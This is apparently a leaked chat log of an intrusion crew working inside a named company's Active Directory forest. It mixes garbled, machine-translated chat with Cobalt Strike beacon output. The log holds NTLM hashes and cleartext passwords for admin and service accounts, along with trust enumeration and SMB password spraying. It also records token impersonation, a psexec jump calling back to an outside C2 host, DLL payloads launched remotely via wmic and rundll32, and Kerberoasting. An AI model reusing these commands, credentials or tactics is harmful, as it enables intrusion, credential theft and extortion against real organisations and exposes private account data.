>memberOf: CN=DL-STANDARDS-APPSENG-APAC Digital CI Team,OU=Groups - Distribution,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-GLOBAL-Jira_Cloud-User,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-0365 Core Applications,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-OKTA-Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-WPFB-Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-Azure-Saiglb Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Americas-Citrix-Remote-PC,OU=Groups - Security,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-SP_Hexaware,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-APAC-Citrix-W8VDI_120GB,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-GLOBAL-Security Training,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-GLOBAL-Tosca_User-Prod,OU=SCCM 2012,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-MFA_Gateway,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-GLOBAL-Confluence_User-Prod,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-WSG-General Internet Access,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-APAC-FPS-Developers,OU=Groups - Security,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=DL-REG_APAC,OU=Distribution Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
```
```
>description: WebSense manager (copwsg05) service account
>sAMAccountName: svc.websense
"memberof" no
dn:CN=Websense Service,OU=AsiaPac,OU=~Service Accounts,DC=saig,DC=frd,DC=global
```
```
>description: Used for N-Cenral Scanning (CHG0045156)
>sAMAccountName: svc.ncentral
>memberOf: CN=SAIG Corporate IT SCCM Read Only,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
>memberOf: CN=APAC vCenter ReadOnly,OU=~ Admin Groups - Restricted Access,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-AMER-VCENTER-Read Only,OU=Groups - Security,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=Domain Admins,CN=Users,DC=saig,DC=frd,DC=global
``it's just a matter of selecting and scrolling
or by
pass
passw
passwd
pass :and each one has a description? scroll down and read everything? so if it's like 3k+ users or whatever)or via -it can be listed in ()I have nothing like pwd, password, pass in the description by the way, and if all these trusts are removed - have you looked at the description and info fields ``?
saiglobal.com\adm.barsmr0 aad3b435b51404eeaad3b435b51404ee:fabb67c5be20e99698dbc77e751afb3f
saiglobal.com\adm.brodan0 aad3b435b51404eeaad3b435b51404ee:06290576382001cd1da4c942e9fa0ca6
saig.frd.global\adm.taydav1 aad3b435b51404eeaad3b435b51404ee:24aa312899f051fbc1a5b464de82c802
saiglobal.com\adm.bisfra0 aad3b435b51404eeaad3b435b51404ee:6778ead5a63d0e8da0a2235147af85a0
saiglobal.com\adm.brodav1 aad3b435b51404eeaad3b435b51404ee:4f1ef28113c7375b22d3f31bd294fa4e
saiglobal.com\adm.evamar1 aad3b435b51404eeaad3b435b51404ee:65a8bca59e4205fc94ed31e11f78d4ac
saiglobal.com\adm.kalnic0 aad3b435b51404eeaad3b435b51404ee:d9c4c5a3dca649913994767d6276b9f9
saiglobal.com\adm.kinzac1 aad3b435b51404eeaad3b435b51404ee:52ab4557416b5fd8dfeed6e329db05fb
saiglobal.com\adm.turime0 aad3b435b51404eeaad3b435b51404ee:2a0974987cad16892cf57c3f3646e1ea
saig.frd.global\svc.sccmcliinst aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67
saig.frd.global\adm.taydav1 aad3b435b51404eeaad3b435b51404ee:24aa312899f051fbc1a5b464de82c802
saig.frd.global\svc.msmap aad3b435b51404eeaad3b435b51404ee:c54366d3aa3826eea0441de8d24a97ee
saig.frd.global\svc.sccmcliinst aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67
saig.frd.global\svc-apac-ems-search aad3b435b51404eeaad3b435b51404ee:3f42b326ea1826890f7bb977474083dc
```s`svc.sccmcliinst I mean jumpscropped by sqladmin once try it once it's ok but the first part is for 1 domain you need both parts of the hash and you can't check it with the smloginommne 11
```
    0: 80-20 80-20.com (Direct Outbound)
    1: LEADERS leaders.frd.global
    2: AUST standards.com.au (Direct Outbound) (Direct Inbound)
    3: LEGALCO legalco.local (Direct Outbound) (Direct Inbound)
    4: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound)
    5: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound)
    6: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound)
    7: C360 c360.local (Direct Outbound) (Direct Inbound)
    8: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound)
    9: C360UK c360uk.local (Direct Outbound) (Direct Inbound)
    10: SAIG saig.frd.global (Forest 5) (Primary Domain) (Native)
``1 trastpochom thing? everything is fresh, hit the ntlm is fresh? ntlm is fresh, the main thing is not to block i can't jump to any ntlm now, or smb login check for jump ntlm is fresh?
sqladmin
svc.msmap
svc-apac-ems-search
``[ ](https://mediaeveryone.com/group/saiglobal-com?msg=q5J9aMTqwWPPZ5TST) I've got some dudes here that don't match me and _*user7* even if you do a ctrl+f in the browser everything matches except sqladmin which doesn't ``
adm.matdmy0
adm.barsmr0
svc.sccmcliinst
adm.brodan0
svc-amer-ems-search
adm.kinzac0
adm.kinzac1
adm.kalnic0
adm.evamar1
adm.turime0
adm.bisfra0
adm.brodav1
adm.taydav1
adm.macpet0
svc.sccmcliinst
sqladmin
svc.sccmcliinst
svc-apac-ems-search
``Successful pings of datacenter.local servers
sqladmin
svc.sccmcliinst
svc-apac-ems-search
``[ ](https://mediaeveryone.com/group/saiglobal-com?msg=KeGz5iQb34qy3GSJQ) remove the crossovers between these and I'll look at ``
adm.barsmr0 adm.taydav1
adm.brodan0 sqladmin
adm.taydav1 svc.msmap
adm.bisfra0 svc.sccmcliinst
adm.brodav1 svc-apac-ems-search
adm.kinzac0
adm.evamar1
adm.kalnic0
adm.kinzac1
adm.turime0
svc.sccmcliinst
```
any crack on them ? ``don't block them try to ping unreachable ones through that trust ? or try LA, DA, EA go to other accessible? how many domains did you get into ``portscan %.%.0/24 445 icmp 1024 ``portscan categorize them which pinged separately, try to ping them by local admin - makes sense yes ``.
i pinged the servers on a "remote" machine from a car i own
```
i'm sorry, i don't understand, you pinged the servers in the remote domain? not the one you're in now, right? i'm pinginging the subnetwork now, i don't have access to the pdk as i understand
i pinged the servers on the "remote" machine from the car which i have critical only if the hostname notound - this means that there is no associated link between the hostname DNS and the actual car - usually it is the "abandoned" entries where the loss - it means no visibility of the host or it is disabled, often pings can be filtered simply iron and these same hosts will ping normally from another place pings do not need to disassemble to 0% Loss and 100% Loss?I'm aware of that, you can export - there is an export if it's more convenient for you.
how do you dump a hash dump into a file
```
hashdump results are saved in cobalt in credentials and you can select the needed hashdumps and copy them to your clipboard
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:16:29> shell nltest /dclist:c360.local
[*] Tasked beacon to run: nltest /dclist:c360.local
[+] host called home, sent: 56 bytes
[+] received output:
Get list of DCs in domain 'c360.local' from '\\AUHDC1-C360-DC1.c360.local'.
    AUHDC1-C360-DC1.c360.local [PDC] [DS] Site: AUHDC1-2
    AUHDC1-C360-DC2.c360.local' [DS] Site: AUHDC1-2
The command completed successfully

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:17:47> shell nltest /dclist:SaigProd.local
[*] Tasked beacon to run: nltest /dclist:SaigProd.local
[+] host called home, sent: 60 bytes
[+] received output:
Get list of DCs in domain 'SaigProd.local' from '\\AUSYDHC-SPPDC03.SaigProd.local'.
    AUSYDHC-SPPDC03.SaigProd.local [DS] Site: Default-First-Site-Name
     AUHDC1-SPPDC02.SaigProd.local [PDC] [DS] Site: Default-First-Site-Name
     AUHDC1-SPPDC01.SaigProd.local [DS] Site: Default-First-Site-Name
The command completed successfully

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 22:18:35> shell nltest /dclist:standards.com.au
[*] Tasked beacon to run: nltest /dclist:standards.com.au
[+] host called home, sent: 62 bytes
[+] received output:
Get list of DCs in domain 'standards.com.au' from '\\ausydhc-austdc1.standards.com.au'.
          sydcpdc00.standards.com.au [PDC] [DS] Site: SYD
    ausydhc-austdc1.standards.com.au [DS] Site: SYD
The command completed successfully

``How you can put a hash dump into the file to tell you the truth I do not know how except ntlest exactly primal domain controller to allocate, but usually LA on different DCs coincide and even control over RODC will advance us enough in the dumps
from the server axis
adm.barsmr0 adm.taydav1
adm.brodan0 sqladmin
adm.taydav1 svc.msmap
adm.bisfra0 svc.sccmcliinst
adm.brodav1 svc-apac-ems-search
adm.kinzac0
adm.evamar1
adm.kalnic0
adm.kinzac1
adm.turime0
svc.sccmcliinst
```
have their creeds ?yesVerely[ ](https://mediaeveryone.com/group/saiglobal-com?msg=xAvwuKGMPvPyZvton) yes:zany_face:
```
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.barsmr0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\svc.sccmcliinst:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.brodan0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\svc-amer-ems-search:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kinzac0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kinzac1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.kalnic0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.evamar1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.bisfra0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.brodav1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.taydav1:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.macpet0:Delta2021$',
[-] 10.225.10.201:445 - 10.225.10.201:445 - Failed: 'datacenter.local\adm.matdmy0:Delta2021$',

[*] 10.225.10.201:445 - Scanned 1 of 1 hosts (100% complete)
``````
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator msxservice
The command completed successfully.


``see the collisions with the current users from DA with the LA list that @user3 you have what EAs in the domain? i.e. @user3 logged in under the DA token from the trusted domain, which turned out to be LA in thismobilize who is in LA```
SAIG\Domain Admins
```Did the LA set from the MAC? What's with the pdk?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=h4FQbM7kNW47PhDSY) @user3oh here's a straightforward set of LAs``
beacon> shell net localgroup "administrators"
[*] Tasked beacon to run: net localgroup "administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
adminstaff
AndrewB
arcserve
AVinstall
AW1.Service
BN.Service
CA - ArcServe
caroot
caunint
CR.Service
Damien
DB.Service
Domain Admins
Enterprise Admins
FL.Service
FS-Tank
Intranet-Service
JF.Service
JH.Service
JonathanH
martin.carlisle
mj.service
MR.Service
msxservice
Nathan.harper
SAI.service
saig.datacentre
SAIG\Domain Admins
ServiceController
SN.Service
ST.Service
SzeWing.Austen
WA.Service
Wendy.Glasgow
WM.Service
The command completed successfully.

Why did I increase the size of the chat messages? So that you could throw archives? From the pdk?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=vyqLkKF5NaEZ8SQfR) I did not work under tokin@user3 send me the information I asked plz with the "remote" domain with the domain? And tell me the local admins on the dk in your domain and from which token was 1 attempt at each user should not come to try to smb login
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct05 21:52:50> shell net use \\\c360.local\c$ Delta2021$ /user:c360.local\adm.turime0
[*] Tasked beacon to run: net use \\\c360.local\c$ Delta2021$ /user:c360.local\adm.turime0
[+] host called home, sent: 94 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.

```
My passssmb_login didn't match either, thenDid it under token from the first time. There are a lot of users and a lot of local admins in the Domain. Dot no vershel also.can check on this password other accounts domain admins with authorization through domain trastanu in general yes, the answer we got anyway, the pass does not match `` ``.
dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

``dadatacenter.local is that right there hostname in another domain?
beacon> shell net use \\\datacenter.local\c$ Delta2021$ /user:datacenter.local\adm.turime0
[*] Tasked beacon to run: net use \\datacenter.local\c$ Delta2021$ /user:datacenter.local\adm.turime0
[+] host called home, sent: 106 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.

``Try a different domain at once with no jumps no yuztak it is automatically made in the jumpsa it was a token, and you need no yuz)``
beacon> make_token saig.frd.global\adm.turime0 Delta2021$

``This was a jumper, especially when there is a cleartext creeda the usual net cses better not check such things with a token, I try the last cser with a different domain is with the current domain
beacon> rev2self
[*] Tasked beacon to revert
beacon> make_token saig.frd.global\adm.turime0 Delta2021$
[*] Tasked beacon to create a token for saig.frd.global\adm.turime0
beacon> jump psexec_psh USHDC1-CSPADS02 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on USHDC1-CSPADS02 via Service Control Manager (PSH)
[+] host called home, sent: 214335 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[-] Could not open service control manager on USHDC1-CSPADS02: 1722
[-] Could not connect to pipe (\USHDC1-CSPADS02\pipe\status_d482): 53
``and then also check @tl2c360.local [10.195.43.2]oo it's just my one trust shared, I've already re-hashed the hashes, this is a fresh ``Password last set 28/09/2020 9:43:00 AM`1 only(``
adm.turime0:Delta2021$
``and the password is possible? and the answer will come by itself = )
this is more of a logical than a technical problem, i.e. you can also consult logic and roughly estimate what is a service that can be connected to other domains and what "unlikely"
read the descriptions of critical servers, look more closely to the very composition of the AD, in a group logic is simple, administrators do not multiply the services in each domain, saving resources and using the services of the "forest"
the second option will be critical MSSQL servers - when you need to exchange data between quarantine and login (for example, some RDBMS aimed at ERP/CRM system)
eExchange and similar typical trust "cross-points" are WSUS / SCCM and other "forest" services
they most often see quarantined segments because they have an interface there and can be represented there, I recommend checking authorization logs on such servers (sitbelt can do this) and so you can find other users from the trusts in the logs (i will look what is there then? but you will know that the pass from this account in two domains is different and so you will have 2 login errors which will not block an account in another domain) with EA is similar to example
```
net use \\datacenter.local\c$ P@ssword /user:saig.frd.global\adm.brodav1
||
net use \\datacenter.local\c$ P@ssword /user:datacenter.local\adm.brodav1
So, there are 2 possible developments, either the current admin will be valid WITH the CURRENT domain or WITH the ACCEPTED one
saig.frd.global
и
datacenter.local
```

``Congruent YES:``
```
adm.matdmy0
adm.barsmr0
svc.sccmcliinst
adm.brodan0
svc-amer-ems-search
adm.kinzac0
adm.kinzac1
adm.kalnic0
adm.evamar1
adm.turime0
adm.bisfra0
adm.brodav1
adm.taydav1
adm.macpet0
```

``Congruent EA:``
```
adm.matdmy0
``We're interested in file storage, backups, edr, virtualization systemsfind adminsAre we interested?
```
SolarWinds.MSP.RpcServerService.exe
These 2 will have to be searched on WSUS servers
Ping request could not find host Anstat.local. Please check the name and try again.
Ping request could not find host leaders.frd.global. Please check the name and try again.
``c360.local [10.195.43.2]
SaigProd.local [10.195.100.1]
standards.com.au [10.195.25.234]
removed ad info and YES and general YES from saig.frd.global`datacenter.local [10.225.10.201]` - removed:
ADinfo
DA
EA
WinServsk by the way from adjacent domains check the ping not availableAUSYD1-COPADS02.saig.frd.global - 10.200.25.149 (shot hell) get into them dump and td here names and ipso from those 5 visible received ip and he pinged okay, let's what is that on the hostname is not pinged, checked the 445 port) selectively? like out of 254 addresses chose 5 random?) on /24 not scanned, only selectively trasts if he does not see dk, does not mean that does not see anything else? sabnet /24 scanned at this domain to 139,445? another thing packet loss 100[ ](https://mediaeveryone.com/group/saiglobal-com?msg=bujgw683YEBYo4Zjd)?that no access from this point is not pinged what does it mean? and from the others? well, yes))) not pinged from the current point?) and half not pinged, about 5 workers) 14 domains, how many done?you have 19 pcs - 5 quarantines with normal trusts sort it out for now leave the karanin domains I do not think that the commands above crashed winlogon did not pay attention when I jumped into winlogon, I think there was nothing what is winlogon? there are two, I missedwinlogon? from what context was the system? or there are 2? or I do not understand it)
80-20 80-20.com
```
is that a whole name? took the trusts from the server where I was, I wanted to ping
syntax is wrong but that's not the point, it didn't even work and the session crashed out of the trusts
```
dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2008/04/03-00:34:59 Eastern Daylight Time
>name: 80-20.com
>securityIdentifier: S-1-5-21-789336058-1343024091-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: 80-20.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``domain_trust80-20 80-20.com what are the targets? It didn't even start.
portscan 80-20 80-20.com 445 icmp 1024
``````
Use: portscan [targets] [ports] [arp|icmp|none] [max connections]
``Jumped over and the session crashed
entire log
What could it be for?
```
beacon> net domain_trusts
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 104513 bytes
[+] received output:
List of domain trusts:

    0: 80-20 80-20.com (Direct Outbound) (Direct Inbound)
    1: LEADERS leaders.frd.global
    2: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound)
    3: C360UK c360uk.local (Direct Outbound) (Direct Inbound)
    4: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound)
    5: AUST standards.com.au (Direct Outbound) (Direct Inbound)
    6: C360 c360.local (Direct Outbound) (Direct Inbound)
    7: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound)
    8: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound)
    9: LEGALCO legalco.local (Direct Outbound) (Direct Inbound)
    10: SAIG saig.frd.global (Forest 4) (Primary Domain) (Native)

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
saig.frd.global
beacon> shell nslookup 80-20 80-20.com
[*] Tasked beacon to run: nslookup 80-20 80-20.com
[+] host called home, sent: 55 bytes
[+] received output:
*** Request to UnKnown timed-out

DNS request timed out.
    timeout was 2 seconds.
Server: UnKnown
Address: 52.58.78.16

DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.

beacon> portscan 80-20 80-20.com 445 icmp 1024
[-] portscan error: Invalid port or range '80-20.com'
beacon> shell ping 80-20 80-20.com -n 1
[*] Tasked beacon to run: ping 80-20 80-20.com -n 1
[+] host called home, sent: 56 bytes
[+] received output:
Ping request could not find host 80-20. Please check the name and try again.

beacon> shell ping LEADERS leaders.frd.global -n 1
[*] Tasked beacon to run: ping LEADERS leaders.frd.global -n 1
``from where did you ping the process? what? if you want access from the current domain - write the login I'll look at the server from where the session came as you leave the session kill) well, from those trusts that have pinged already got hell infokonitely, or do you think that there all hell is already redone?) now you pass and you will be distributed to different servers just sorted YES from c360.local and sorted common with saig.frd.global
and then the session fell off (-if the dll doesn't delete it, it's better to do it via dlld, sposk servers from AD, and where there are no / few DA processes+ who fell off can get back into the network via the peersSelect different servers and there away from the peers perform their tasks now should be+ -in a couple minutes will be anyone besides @user3 get into a different domain?who has a session fell off - that's the noise)distribute on different servers@user1 gave a session from another placeI still alive)not at the same time but still in turn normally at the same time? noise in general in terms of noise is normal that we all trusts were started with one machine? shut down the server) ``
[+] received output:

Pinging 10.195.115.49 with 32 bytes of data:
Request timed out.

Ping statistics for 10.195.115.49:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

If you're talking about all the actions, then a couple of other accounts have been blocked) all the noise and kerb and adnashumeli? 32m respond in terms of dead@tl1
sessions fell off2 pass between identical users in two domains can be identical1 you deduct EA and YES from two domains and look for collisions here's what you're confusing me thought it was 20+ October I got confused in months of course ok) and the stoppass from 2027 changed what ok?
Password last set 27/09/2020 4:07:48 AM
Password expires 11/12/2020 4:07:48 AM
Password changeable 28/09/2020 4:07:48 AM
Password required Yes
User may change password Yes

``Why? net user to check withmb_login? 1) the password to the account fits? or it changed? it seemed or why there is a pass in the domain I have not very good vision``
beacon> portscan 10.225.10.201 445
[*] Tasked beacon to scan ports 445 on 10.225.10.201.
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.225.10.201' is alive. [read 8 bytes]

[+] received output:
10.225.10.201:445 (platform: 500 version: 10.0 name: USHDC1-CSPADS02 domain: DATACENTER)
Scanner module is complete

``Just like this, I added him to the targets on the datacenter will I get a jump like this? with the one you gave him found a man matching I downloaded from datacenter.lokal ad_userssmarid?went ping on the host Team Lead 1@tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1@tl1@tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1@tl1@tl1
@tl1@tl1
@tl1@tl1 not to copy anything directly therewhat's the best way to get a session on the pdk so you don't lock the account? have you done it under a token?
trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)]
```
I don't like his treat-external, is the domain big? ```
dn:CN=legalco.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2010/06/02-00:05:33 Eastern Daylight Time
>name: legalco.local
>securityIdentifier: S-1-5-21-1275210071-2025429265-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: legalco.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)]
``either there will be something else there at least 6 people per comptroller so either there will be 0 and nothing found - 136
users 828
groups - 98 it does not record gradually and at all, as I remember, adfind writes to the file as soon as the stream ends and YES 500, most likely there is not enough) if the pc 5 how many users, groups, pc, and so tdu @user8 one pc, router and bucket..xD That's what I wanted to hear, thank you, God bless all the good things depending on the purpose of the domainwhere 200+where it could be 2000+ pktut not that each domain is the size of all the others) I, how should I say it ... not too early to stick it out? the guys there are 10+ meters less than a megabyte file me in the data center ad_computer to 136 comps only a question when the session will be in another domain, then you can learn LA on pdc@tl1
what command can you send a request for the withdrawal of admins to the PDK?
YES, EA ok from ad_users are pulled, but LA with what can be pulled?
shell copy npCIDetect.dll \10.195.23.1\C$\ProgramData
shell wmic /node:10.195.23.1 process call create "rundll32 C:\ProgramData\npCIDetect.dll entryPoint"
how did it get there ?@tl1 I'm walking around in the first posts @tl1 from hell what to get ? or all ?.if they are identical, then in the future you can choose any of the options try -h 1 category remove and compare results if it goes well first try through -b do not know this key) and no copying of files and loqs do you have any guides on adfind.exe ? how do you do it? great)@user3 where did you go?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=yciY2CdqLzmMKvmpx) and how do you implement trust in this scheme? fill and run the adfind batnick before you fucking block the account again who the fuck else calm down man
beacon> make_token saig.frd.global\Americadpm B0b@f3tt
[*] Tasked beacon to create a token for saig.frd.global\Americadpm
[+] host called home, sent: 53 bytes
[+] Impersonated NT AUTHORITY\SYSTEM

beacon> shell copy x64.dll \10.225.10.201\C$\windows\Temp\
[*] Tasked beacon to run: copy x64.dll \\\10.225.10.201\\C$\windows\Temp\
[+] host called home, sent: 76 bytes
[+] received output:
Access is denied.
        0 file(s) copied.

``My question again I ask you how do you remove adlocate an account in another domain where there is no access already unblocked accts should already have ceased to work with trustsbut did not notice) ahahahahaht to you already in this domain)))))) and inmikpotentially allowed to copylegalco.global how come) the current domain trusts the current domain) saig.frd.global ``
beacon> psinject 760 x64 Invoke-Kerberoast -outputformat hashcat | fl | out-file -filepath C:\Windows\Temp\Eula.txt -append -force -encoding UTF8
[*] Tasked beacon to psinject: Invoke-Kerberoast -outputformat hashcat | fl | out-file -filepath C:\Windows\Temp\Eula.txt -append -force -encoding UTF8 into 760 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
Failed to create the runtime host
``what is the current domain?
beacon> make_token saig.frd.global\Americadpm B0b@f3tt
[*] Tasked beacon to create a token for saig.frd.global\Americadpm
[+] host called home, sent: 53 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell copy x64.dll \10.212.8.247\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\\10.212.8.247\C$\ProgramData
[+] host called home, sent: 73 bytes
[+] received output:
        1 file(s) copied.
beacon> shell wmic /node:10.212.8.247 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.212.8.247 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 119 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 8036;
	ReturnValue = 0;
};


``what was the command? and what was the token? yes[ ](https://mediaeveryone.com/group/saiglobal-com?msg=NwFq9MYq8oLEpnLpj) on the pdc from the trusts?
beacon> shell copy x64.dll \datacenter.local\C$\windows\Temp\
[*] Tasked beacon to run: copy x64.dll \\\datacenter.local\C$\windows\Temp\
[+] host called home, sent: 79 bytes
[+] received output:
The system cannot find the file specified.
        0 file(s) copied.


beacon> shell copy C:\ProgramData\x64.dll \\\datacenter.local\C$\\windows\Temp\
[*] Tasked beacon to run: copy C:\ProgramData\x64.dll \\datacenter.local\C$\windows\Temp\
[+] host called home, sent: 94 bytes
[+] received output:
The system cannot find the file specified.
        0 file(s) copied.

deleted the files made a token, copied the dlc there, ran
i took the token from the trusts, so all together not to sit on the same one did you take the token off? no questions followed, so it was clear to everyone the principle of trust i explained above or did you make the token? did someone copy something somewhere? to remove the kerbs from the trusts now also unlocked the token an important object i unlocked the token
beacon> make_token saig.frd.global\sqladmin u5t3r
[*] Tasked beacon to create a token for saig.frd.global\sqladmin
[+] host called home, sent: 48 bytes
[+] Impersonated NT AUTHORITY\SYSTEM


beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes


beacon> shell copy x64.dll \\datacenter.local\C$\windows
[*] Tasked beacon to run: copy x64.dll \\\datacenter.local\C$\windows
[+] host called home, sent: 73 bytes
[+] received output:
The referenced account is currently locked out and may not be logged on to.
        0 file(s) copied.

``made a token on it
copy the dhelka to datacenter.local
this is a mistake how can i lock the account here tell me what you do))
User name sqladmin
Full Name SQL Admin
Comment SQL Service Account
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 9/08/2007 11:31:52 AM
Password expires Never
Password changeable 10/08/2007 11:31:52 AM
Password required Yes
User may change password Yes
```
```
The referenced account is currently locked out and may not be logged on to.
        0 file(s) copied
``````
Liverpool1! /user:saig.frd.global\adm.yorgar0
``This is valid creeds yes[ ](https://mediaeveryone.com/group/saiglobal-com?msg=4MhjNGRXYY52KgfTf) under this token can I do? let's you discuss the issues between you first) yes everything is? so, and the AD how to shoot if the files do not copy?
chs@1944! /user:saig.frd.global\adm.soucam1
I actually unhooked it with this error after the error[ ](https://mediaeveryone.com/group/saiglobal-com?msg=x24ZPHvo9Aa7oJnww) did you exactly unhook it without the token?
datacenter.local [10.225.10.201] - removed the kerb under the token
ad-apse2.build.aws.saig - not pinged
ad-usea1.prd.aws.saig - not pinged
c360uk.local - not pinged
``also not taken off``
now it's hanging on this
```
beacon> psinject 440 x64 Invoke-Kerberoast Invoke-Kerberoast -OutputFormat HashCat -Domain legalco.local | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast Invoke-Kerberoast -OutputFormat HashCat -Domain legalco.local | fl into 440 (x64)
[+] host called home, sent: 133723 bytes

``Are all the aces normal? c360.local
SaigProd.local
standards.com.au
kerbs are not removed from them from any context currently available domains, remove hell infoSo the second removed kerbs, with the rest what?
```
